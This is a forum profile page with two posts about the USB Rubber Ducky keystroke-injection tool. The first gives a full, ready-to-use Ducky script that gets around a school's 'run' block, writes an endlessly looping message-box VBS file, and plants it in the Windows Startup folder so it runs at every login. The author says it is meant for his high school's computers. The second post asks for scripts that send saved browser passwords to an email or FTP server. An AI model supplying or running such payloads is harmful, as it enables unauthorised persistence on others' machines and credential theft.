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Everything posted by SouahNips

  1. Generates a vbs file(when its run, it pops up boxes that say whatever was in the quotes) that is then saved in the startup folder, its suggested that you change the text within the quotes, but leave the quotes there. http://www.iducke.com/Encoder/IDE/4q is the online encoder address, but heres the code: REM Author: SouahNips REM description: creates pop ups that state whatever is in the quotes REM Notes: For use with windows 7 ONLY if you want to use with xp or both, then change "CONTROL ESCAPE"(line 1) to "GUI r" and "STRING NOTEPAD" to "STRING notepad.exe" REM Reason: the reason i used this form of opening notepad is because I wanted to use this on my highschool's computers and they have run blocked. CONTROL ESCAPE DELAY 50 STRING NOTEPAD DELAY 10 ENTER DELAY 800 STRING msgbox "Noah" ENTER STRING msgbox "Is" ENTER STRING msgbox "A" ENTER STRING msgbox "Straight" ENTER STRING do ENTER STRING msgbox "BEAST" ENTER STRING loop DELAY 20 CTRL s DELAY 200 STRING %userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Runnit1.vbs DELAY 10 TAB DELAY 5 DOWN DOWN DELAY 5 ENTER DELAY 5 ENTER Have fun :)
  2. My USB rubber ducky is on its way, and I wanted to know a couple things so that I can get started right away :) My first question concerns the duckencoder... what's the difference between GUI and MENU within the script? Secondly, does anyone know any scripts that will send saved passwords from someone's main browser to an email/FTP server? Thirdly, Is there a way to access a desktop icons properties from the keyboard? Finally, Are the payloads from the ducky github seriously all there is? Although there's a lot left for development this product has a huge amount of potential! Thanks for your time and any responses you might leave. :)
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